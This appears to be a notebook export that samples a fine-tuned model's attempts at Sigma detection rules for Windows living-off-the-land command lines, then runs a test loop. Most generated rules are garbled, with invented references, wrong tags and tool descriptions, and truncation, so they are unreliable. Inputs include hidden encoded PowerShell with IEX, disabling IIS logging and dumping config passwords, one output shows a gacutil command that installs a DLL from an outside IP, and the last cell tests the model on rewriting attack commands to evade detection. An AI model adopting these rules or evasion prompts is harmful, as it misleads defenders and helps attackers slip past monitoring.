You seem to be using the pipelines sequentially on GPU. In order to maximize efficiency please use a dataset


### Instruction:
Write Sigma rule to detect payload:

### Input:
TruffleSnout.exe \TruffleSnout.exe

### Response:
Detect the TruffleSnout suspicious process creation
id: 225a0f1b-2a65-429c-b079-957630428056
status: test
description: Detects the suspicious process creation of TruffleSnout, a Windows utility for extracting files from encrypted containers
references:
    - https://www.trustedsec.com/blog/trufflesnout-windows-utility-for-decryption/
    - https://github.com/LOLBAS-Project//blob/600bff0546f119b9427b7d4cf571e70f1cf1804//tags/tag_trufflesnout.md
author: frack113
date: 2021-10-17
modified: 2022-08-23
tags:
    - attack.execution
    - attack.credential-access
    - attack.t1003
    - attack.defense-evasion
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\TruffleSnout.exe'
    condition: selection
falsepositives:
    - Unknown
level: medium

---

### History

The initial discovery of TruffleSnout, a utility that

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
Offline_Winpwn WinPwn WinPwn.exe WinPwn.ps1

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
Offline_Winpwn WinPwn WinPwn.exe WinPwn.ps1

### Response:
For each item in the input list, the script will search the user's profile location (%userprofile%) for the binary, script, or module and will return the found item.

The script will return the item if it finds a match in the user's profile location.

The search can be done on the entire file system, but it can take a long time.

### Note:
The script requires the use of PowerShell, so the user's profile location should be set.

The search only checks for the specified file extensions and is case insensitive.

### Workflow:
Input: \Offline_Winpwn.ps1.ps1,.exe,.ps1
Output:
- File: \user\profile\Offline_Winpwn.ps1.ps1
- File: \user\profile\WinPwn.exe
- File: \user\profile\WinPwn.ps1

## Atomic Tests

- Atomic Test #1 - Identify Potential Powershell Profile Locations
Identify potential profile locations by searching the Registry for known profiles

**Supported Platfor

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc

### Response:
Input:
Encrypted PowerShell script:
Set-ExecutionPolicy Bypass;IEX ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('"')))

Response:
Script was executed by an unknown process
title: Potential Defense Evasion
id: 441b2546-12f1-43b4-895c-52872a7328b0
status: test
description: Detects the use of PowerShell in order to download and execute a script from a specified URL (encoded as base64). This technique can be used to perform a defensive evasion to bypass security controls that block script execution, as well as for other legitimate purposes.
references:
    - https://eqllib.readthedocs.io/en/latest/analytics/4218c10f-789b-48e2-b3f5-e0a5e56f8738.html
    - https://lolbas-project.github.io/lolbas/Binaries/PowerShell/
author: X__toaster (Nextron Systems)
date: 2021-10-21
modified: 2023-02-07
tags:
    - attack.execution
    - attack.defense-evasion
l

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\HOSTNAME.EXE

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\HOSTNAME.EXE

### Response:
- title: Hostname Execution
  id: 87725d8a-9d36-407d-b25f-b3663622b17e
  status: test
  description: Detects execution of the hostname binary. This can be used by adversaries as a diagnostic tool to determine what hostname they are on.
  references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d0f6edf7f3f64daf0a7735c638c3226/atomics/T1012/T1012.md#atomic-test-1---hostname-execution
    - https://eqllib.readthedocs.io/en/latest/analytics/f3957972-0728-404a-9b46-b4f42c3e412f.html
    - https://app.hsf.io/hsf/details/263743
  author: '@n00py2u5', '@mr_mechanoid', '@redcanaryco'
  date: 2023-05-05
  tags:
    - attack.execution
    - attack.discovery
  logsource:
    category: process_creation
    product: windows
detection:
  - selection:
      Image|endswith: '\HOSTNAME.EXE'
    condition: selection.Image
  - selection:
      OriginalFileName: 'hostname.exe'
    condition: 

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\Hwp.exe \\gbb.exe

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\Hwp.exe \gbb.exe

### Response:
Export:
    - module: HWPFile
      timeframe: recent
      filter_query: "process_name:gbb.exe OR process_name:Hwp.exe"
      query_string: "process_name:gbb.exe OR process_name:Hwp.exe"
    title: Suspicious File Creation Via GBB.EXE/HWP.EXE
    description: Detects the creation of suspicious files (exe, dll) using GBB.EXE or HWP.EXE. This could be indicative of a compromise
    severity: medium
    type: process_creation
    tags:
        - attack.execution
        - attack.t1059
        - attack.s0070
    status: test
    group: file
    description: |
        Detects the creation of suspicious files (exe, dll) using GBB.EXE or HWP.EXE. This could be indicative of a compromise.
        GBB.EXE is a free utility for compressing and decompressing files. HWP.EXE is a utility for formatting and manipulating hard disks.
        Both of these utilities are often used in ransomware.
    relat

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
iCACLS.EXE \\icacls.exe /deny S-1-1-0:

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
iCACLS.EXE \icacls.exe /deny S-1-1-0:

### Response:
An adversary may use the "icacls.exe" utility to set permissions to prevent access to a file or folder.

In order to use "icacls" to set permissions, an adversary would first need to identify the SID of the user or group they want to deny access to.

### Detection:
When an adversary attempts to use the "icacls" utility to set permissions, the "deny" flag and the SID of the user or group they want to deny access to will be present in the arguments of the process.

Adversaries may use the "icacls" utility to set permissions (e.g. "deny" flag) to prevent access to a file or folder. 

Adversaries using this technique may use a pre-compiled copy of "icacls" or use the "mshta" function to download and run the program.


### Potential Commands:

  - "icacls.exe" /deny S-1-1-0: # using the /deny flag


### Sigma rule:
Input: \icacls.exe \icacls.exe /deny S-1-1-0:
id: 97065559-1

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\IEExec.exe IEExec.exe http:// https://

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\IEExec.exe IEExec.exe http:// https://

### Response:
The command line arguments passed to the process may reveal sensitive information.
title: Potential Sensitive Information Revealed By IEExec
id: 51e2f4d9-084b-4871-8d4a-c702e1639028
status: test
description: Detects potential sensitive information revealed by IEExec.exe
references:
    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/cc771305(v=ws.10)
    - https://ss64.com/nt/ieexec.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-11-16
modified: 2024-12-14
tags:
    - attack.credential-access
    - attack.t1059
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Image|endswith: '\IEExec.exe'
        - CommandLine|contains:
            - 'http://'
            - 'https://'
    condition: selection
falsepositives:
    - Uncommon
level: medium




```






In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\appcmd.exe appcmd.exe set config section:httplogging dontLog:true

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\appcmd.exe appcmd.exe set config section:httplogging dontLog:true

### Response:
Analyze results of an attack to see if any logs were disabled. The logs might be enabled by default by the MSI installer or other installers.

### Detection:
Get the configuration sections from the "appcmd.exe" app command and check for "httpLogging" section and if the "dontLog" attribute is set to "true".

### Resources:
- https://lolbas-project.github.io/lolbas/Binaries/Appcmd/
- https://learn.microsoft.com/en-us/iis/get-started/planning-for-security/iis-logs-and-trace-logs
- https://github.com/LOLBAS-Project/ package
    module: Internal
    category: Actions
    description: |
        Modify the HTTP logging configuration for IIS.
        T1070  - Credential Dumping
        T1003 - Credential Access by Pass the Hash
        T1003 -  Credential Access by  Pass the Ticket
        T1098 -  use Logging to bypass ACL
        T1033 -  use Logg

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\appcmd.exe appcmd.exe list /config /xml -config -xml /@t /text /show -@t -text -show :\\ password

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\appcmd.exe appcmd.exe list /config /xml -config -xml /@t /text /show -@t -text -show :\ password

### Response:
@success: true
@alias: DetectAppcmdApppoolList
title: Potential Appcmd.EXE Privilege Escalation
id: 5868f33c-44e7-40f1-957b-7e527d57c93d
status: test
description: Detects a potentially privileged command executed by appcmd.exe that lists the content of the web.config file.
references:
    - https://www.leastprivilege.com/2016/12/06/appcmd-exe-escape-to-local-system/
    - https://www.sans.org/blog/threat-intelligence/privilege-escalation-potential-with-appcmd-exe/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2019-08-11
modified: 2021-11-27
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'appcmd.exe'
            - 'list /config /xml'
            - '/@t'
            - '/t

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\appcmd.exe appcmd.exe set config section:system.webServer/rewrite/globalRules commit:

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\appcmd.exe appcmd.exe set config section:system.webServer/rewrite/globalRules commit:

### Response:
For this particular example, the "commit" key word is used to indicate the change has been made to the IIS configuration file.
It's not possible to find all of the IIS configuration files on a system and there is no way to find all IIS related configurations.
Because of that, appcmd.exe is used as a "probe" to detect IIS installed on a system.
If you find another way to detect IIS install, please share with us, we will update our rule.


### Detection:
Selection | filter_operator: match_regex | regex: '\appcmd.exe appcmd.exe set config section:system.webServer/rewrite/globalRules commit:.+'


### Comments:
This rule only returns the configuration value.
For the complete configuration details, please execute:
appcmd.exe set config section:system.webServer/rewrite/globalRules


### False Positives:
False positives may be ca

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\aspnet_regiis.exe aspnet_regiis.exe connectionStrings -pdf

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\aspnet_regiis.exe aspnet_regiis.exe connectionStrings -pdf

### Response:
Input command to find more details about the given command:

aspnet_regiis.exe -h


### Detection:
Selection | _ |
:---: | :---: |
title: ASP.NET Config Registry Key Tampering
id: 45b18d9d-a72e-42e4-b85f-b63e439a782b
status: test
description: Detects the use of the "aspnet_regiis.exe" utility in order to modify or add registry keys related to ASP.NET.
references:
    - https://learn.microsoft.com/en-us/aspnet/core/security/data-protection/configuration/machine-wide-policy
author: Nasreddine Bencherchali (Nextron Systems)
date: 2021-08-31
tags:
    - attack.credential-access
    - attack.t1216
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\aspnet_regiis.exe'
        CommandLine|contains:
            - 'connectionStrings'
            - '-pdf'
    condition: selection
falsepositives:


In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\w3wp.exe appcmd.exe add module system.enterpriseservices.internal.publish \\powershell.exe gacutil /I

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\w3wp.exe appcmd.exe add module system.enterpriseservices.internal.publish \powershell.exe gacutil /I

### Response:
An attacker can abuse Windows Management Instrumentation (WMI) to remotely execute arbitrary commands.
The following example shows a command chain that leverages PowerShell, appcmd.exe, and gacutil.exe to download, install, and execute a.NET assembly.


```
powershell.exe appcmd add module system.enterpriseservices.internal.publish gacutil /i http://1.2.3.4:8000/binary/Pwnd.dll PwndModule
```



Additional Details:
    - https://twitter.com/Eddie_Rohde/status/1633962270746478336
    - https://app.sentinelone.com/console/notebooks/4c681565-8320-48e8-8597-753e670d649f

Author: Florian Roth (Nextron Systems)
Date: 2022-06-02
Tags:
    - attack.execution
    - attack.t1127
    - attack.defense-evasion
    - attack.privilege-escalation
    - attack.execution.cmd
    - attack.t1127
logsource:
    category: proces

In [ ]:
################################################################test

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\AccCheckConsole.exe AccCheckConsole.exe -hwnd -process -window

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\AccCheckConsole.exe AccCheckConsole.exe -hwnd -process -window

### Response:
detect_acccheckconsole.yara
title: Suspicious AccCheckConsole Execution
id: 4b8e2a90-a84b-41a2-b1fe-46a1a8bb9c0e
status: test
description: Detects suspicious execution of AccCheckConsole.exe to validate user access to specified window.
references:
    - https://lolbas-project.github.io/lolbas/Binaries/AccCheckConsole/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2021-12-07
modified: 2023-01-13
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\AccCheckConsole.exe'
        CommandLine:
            - '-hwnd'
            - '-process'
            - '-window'
    condition: selection
falsepositives:
    - Unused
level: medium

```


### powershell
    
```powershell
Get-WinEvent -LogName Application | where {($_.message -match "

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\AccCheckConsole.exe AccCheckConsole.exe -hwnd -process \\\"-\\\"\\\"w\\\"\\\"i\\\"\\\"n\\\"\\\"d\\\"\\\"o\\\"\\\"w\\\"

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\AccCheckConsole.exe AccCheckConsole.exe -hwnd -process \"-\"\"w\"\"i\"\"n\"\"d\"\"o\"\"w\"

### Response:
@operator: or
title: Suspicious AccCheckConsole Activity
id: 41c2517b-d822-429b-9f96-52404907e6b9
related:
    - id: 3dd9c66d-b230-4602-9c48-d45e7d095f85
      type: similar
status: test
description: Detects the execution of "AccCheckConsole.exe" by a potentially suspicious process.
references:
    - https://lolbas-project.github.io/lolbas/Scripts/AccCheckconsole/
    - https://github.com/LOLBAS-Project//blob/94938ec2b555b8128c4a37e6e26828a100dbd144//escript/Binaries/AccCheckConsole.exe
author: Nasreddine Bencherchali
date: 2022-04-12
modified: 2023-12-07
tags:
    - attack.execution
    - attack.t1059
    - attack.defense-evasion
    - attack.privilege-escalation
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\AccCheckConsole.exe'
        CommandLine

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\AccCheckConsole AccCheckConsole -hwnd -process -window

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\AccCheckConsole AccCheckConsole -hwnd -process -window

### Response:
\acccheckconsole.exe \acccheckconsole.exe -hwnd -process -window \acccheckconsole.exe -hwnd -process -window


### Detection:
selection | where INPUT_ARGS.process.exe.parent_path.endswith('acccheckconsole.exe')
selection | where INPUT_ARGS.hwnd.endswith('.exe')


### POC:

AccCheckConsole is a utility provided by Microsoft to check the accessibility of an application's window, menu items, and controls.

AccCheckConsole can be abused by attacker to gather information about the running processes of the targeted system by using the hwnd parameter.

AccCheckConsole can also be used to enumerate the applications installed on the targeted system by using the process parameter.

Adversaries can use this information to discover information about installed software and services, such as product names, versions, and install paths, which may be useful for plannin

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\AccCheckConsole.exe -window AccCheckConsole.exe -process -hwnd

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\AccCheckConsole.exe -window AccCheckConsole.exe -process -hwnd

### Response:
{
    "author": "@neu5ron",
    "description": "Detects the execution of the AccCheckConsole utility that is used by the Microsoft Accessibility Checker.
    This utility can be used to check the accessibility of a Windows application and its subsystems.",
    "references": [
        "https://twitter.com/neu5ron/status/1625076324378545409"
    ],
    "modut:
        title: PUA - AccCheckConsole.EXE Execution
        id: 62e7595f-482f-4002-b1c7-4d80777f8691
        status: test
        description: Detects the execution of the AccCheckConsole utility that is used by the Microsoft Accessibility Checker.
        # microsoft-defender
        # real-time
        # non_unicode_supp
        # defender-cuckoo
        # defender-scanner
        # defender-wincuckoo
        # defender-wincuckoo- @neu5ron
        # defender-wincuckoo- @lolbin
        # de

In [ ]:
from tqdm import tqdm
import json

# Load test set
with open("/content/test_data.jsonl", "r", encoding="utf-8") as f:
    test_data = [json.loads(line) for line in f]

# Prompt format giữ nguyên như khi training
def build_prompt(command: str) -> str:
    return f"""### Instruction:
Modify the following attack command to evade detection.

### Input:
{command}

### Response:
"""

results = []

for example in tqdm(test_data, desc="💥 Testing on test set"):
    command = example["input"]
    expected = example["output"]

    prompt = build_prompt(command)

    try:
        # Generate full output
        gen_output = pipe(prompt, max_new_tokens=60, do_sample=True, temperature=1.0, top_p=0.9)[0]["generated_text"]
    except Exception as e:
        gen_output = f"[ERROR] {str(e)}"

    results.append({
        "input": command,
        "output_expected": expected,
        "output_model": gen_output
    })

# Save to JSONL
with open("/content/model_test_results.jsonl", "w", encoding="utf-8") as f:
    for r in results:
        f.write(json.dumps(r, ensure_ascii=False) + "\n")

print("Đã test xong toàn bộ và lưu kết quả vào model_test_results.jsonl")